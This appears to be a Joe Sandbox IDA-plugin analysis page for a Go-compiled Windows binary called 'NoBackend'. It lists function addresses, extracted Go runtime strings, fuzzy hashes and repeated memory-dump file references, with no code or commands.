String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC$delayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: waiting for Gwaiting but is Grunnablecrypto/tls: Exp$malloc deadlockruntime error: elem size wrong with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = recovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=]morebuf={pc:: no frame (sp=runti$malloc during signalclose of nil channelinconsistent lockedmnotetsleep not on g0bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=$mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCallback: function argument frame too largecrypto/cipher: incorrect nonce length given to GCMtls: recei$mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno=
API String ID: 0-2662653666
Opcode ID: 65fd8edaaab4d97219ded8342ce206cf83730182d9309fa6e68ad285c5f8cc03
Instruction ID: 064cd1e6472ba147615d7aabdfab6aebe5907fe10057864b34546c7941c443b0
Opcode Fuzzy Hash: 65fd8edaaab4d97219ded8342ce206cf83730182d9309fa6e68ad285c5f8cc03
Instruction Fuzzy Hash: D0222872618B8082DB65CF15E4407AABBA5F389BD5F4842E6EF8D07795CF78C889C740

Uniqueness

Uniqueness Score: -1.00%

Function 00B84C20 Relevance: 4.0, Strings: 3, Instructions: 268COMMON

Download Yara Rule

Strings

runtime.preemptM: duplicatehandle faileddeferproc: d.panic != nil after newdefermust be able to track idle limiter eventruntime: SyscallN has too many argumentsNumericString contains invalid charactercannot represent time as GeneralizedTimecrypto/cipher: messa, xrefs: 00B85085
runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=converting driver.Value type %T (%q) to a %s: %vfailed to parse certificate #%d in the chain: %wtls: CurvePreferences includes unsupported curvebufio: writer return, xrefs: 00B8505D
self-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchwith name %qKernel32.dlldQw4w9WgXcQ:not pollableRevertToSelfCreateEventWGetConso, xrefs: 00B85096

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: runtime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=converting driver.Value type %T (%q) to a %s: %vfailed to parse certificate #%d in the chain: %wtls: CurvePreferences includes unsupported curvebufio: writer return$runtime.preemptM: duplicatehandle faileddeferproc: d.panic != nil after newdefermust be able to track idle limiter eventruntime: SyscallN has too many argumentsNumericString contains invalid charactercannot represent time as GeneralizedTimecrypto/cipher: messa$self-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatchwith name %qKernel32.dlldQw4w9WgXcQ:not pollableRevertToSelfCreateEventWGetConso
API String ID: 0-1489571532
Opcode ID: 56ebffc1b41643b0c07766ec9d45c77a641dba660e0ca13d0ea440cb04eff46e
Instruction ID: 8673455ecc860bf9845bebeca474f8eba453cf622aaccc1de63cd443cd11e655
Opcode Fuzzy Hash: 56ebffc1b41643b0c07766ec9d45c77a641dba660e0ca13d0ea440cb04eff46e
Instruction Fuzzy Hash: 92C1A036609F8185DB15EF25E4813AA77A4F38AF90F148276DB9C537A5DF79C482C700

Uniqueness

Uniqueness Score: -1.00%

Function 00B9BBE0 Relevance: 1.7, Strings: 1, Instructions: 401COMMON

Download Yara Rule

Strings

!"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 00B9BCBA, 00B9BD9A, 00B9BEB0, 00B9BFCC

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
API String ID: 0-2911004680
Opcode ID: 87d408dcf762af59bf75f72cc5073f1f841e1457792fe13fc50a24f03ed01317
Instruction ID: 168286eb50e6ba766d7c60b68ae5e0d6cd129e3b3782586fecec13f196d76f89
Opcode Fuzzy Hash: 87d408dcf762af59bf75f72cc5073f1f841e1457792fe13fc50a24f03ed01317
Instruction Fuzzy Hash: 68E1E272708B8486EE009F55E5403E9A7A6F785BD0F884572EB8E17B95CFBCC585C304

Uniqueness

Uniqueness Score: -1.00%

Function 00B78000 Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

grew heap, but no adequate free space foundroot level max pages doesn't fit in summaryunfinished open-coded defers in deferreturnruntime: releaseSudog with non-nil gp.paramunknown runnable goroutine during bootstrapruntime: casfrom_Gscanstatus bad oldval gp=ru, xrefs: 00B78562

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID: grew heap, but no adequate free space foundroot level max pages doesn't fit in summaryunfinished open-coded defers in deferreturnruntime: releaseSudog with non-nil gp.paramunknown runnable goroutine during bootstrapruntime: casfrom_Gscanstatus bad oldval gp=ru
API String ID: 0-3045916205
Opcode ID: 420b406c72d0cf6429759c474a9099759f065e193565da7d3c7ea92d3be27f28
Instruction ID: 6dd2ada5af8004add8419e2852dfaa766e2f5f652a9c02f23a87e50fd0e7f72b
Opcode Fuzzy Hash: 420b406c72d0cf6429759c474a9099759f065e193565da7d3c7ea92d3be27f28
Instruction Fuzzy Hash: 2CE19D32249B8485DB21CF16E48439ABBA1F78ABD0F588156EEDD43B29DF38C495CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00B94BC0 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c0c2851f0ab368affb64ad4002b1db79623ee5fbf40565b16cd80b1d65d0ad1
Instruction ID: 7e0670868919c07eb8ab03644e142a1315c1626f599c4b1da7aae521eedabc77
Opcode Fuzzy Hash: 4c0c2851f0ab368affb64ad4002b1db79623ee5fbf40565b16cd80b1d65d0ad1
Instruction Fuzzy Hash: 40C19D36309B44C6DF14DF15E4917AAB7A0F78AB80F4451B6EA8D47B69DBBCC885CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00B8E500 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25274c10a0119410da2b266826a7d3f5ca3655990fb4e2534f8d789f9d062f4b
Instruction ID: 48c77c64f07ff9e4594049a71f899a1017edd9f430e63466b6a65bbf4624bb43
Opcode Fuzzy Hash: 25274c10a0119410da2b266826a7d3f5ca3655990fb4e2534f8d789f9d062f4b
Instruction Fuzzy Hash: BE81F476B05600CAEF15BF14E8C03A963E2E795B98F5890B5DA9C17735EB78C8C5C740

Uniqueness

Uniqueness Score: -1.00%

Function 00B77360 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 676d7c173068273cb86d67728062c962f54e371c2b44ed582b0cf3f976e06738
Instruction ID: ca9c6cd0bd813326a71294c76841be080466b1126ae7473e37a4fffb11acc884
Opcode Fuzzy Hash: 676d7c173068273cb86d67728062c962f54e371c2b44ed582b0cf3f976e06738
Instruction Fuzzy Hash: 94419F76718F84A2D708CB19E8813DAB7A4F385B90F898166DF5E53729CF39C546C700

Uniqueness

Uniqueness Score: -1.00%

Function 00B82820 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0051ddf5e723a01b162e2a664cf8d7054cf03fa16ef3fff4fd9aeb47aee352a
Instruction ID: 3dd545c43cd67ed638dee511e16185a47d073fff978271949deed393252fd17a
Opcode Fuzzy Hash: e0051ddf5e723a01b162e2a664cf8d7054cf03fa16ef3fff4fd9aeb47aee352a
Instruction Fuzzy Hash: 64215132A08B8581DA14DB21F44136A77A0F34ABD4F549362EE9D47BA5DB78C181CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00B9AC20 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.00000000010E6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.000000000110E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072943853.0000000001112000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.0000000001115000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073012622.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073152994.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2073164298.000000000133B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_NoBackend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df829a70e04f7e76840d159c0324b301d3b3b7412906096a67285144b15ffc3
Instruction ID: 74c2749bf668730ccbdf12bcd12ca38f0e0a9a63e4bca360a749296a2b9a219c
Opcode Fuzzy Hash: 1df829a70e04f7e76840d159c0324b301d3b3b7412906096a67285144b15ffc3
Instruction Fuzzy Hash: 9321FC36604F45C5DA04DF22F48536A7BA4F74AB80F15C662DE9C87761EFBAC092C700

Uniqueness

Uniqueness Score: -1.00%

Function 00B95060 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072496505.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000000.00000002.2072417279.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072645084.0000000000DE5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072812798.0000000001078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072825880.000000000107B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072837688.000000000107D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072847711.000000000107E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072857117.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072866452.0000000001080000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072887451.00000000010AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072899151.00000000010B1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072912738.00000000010B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2072927070.00000000010B5000.00000008.00000001.01000000.00000003.sdmpDownload File
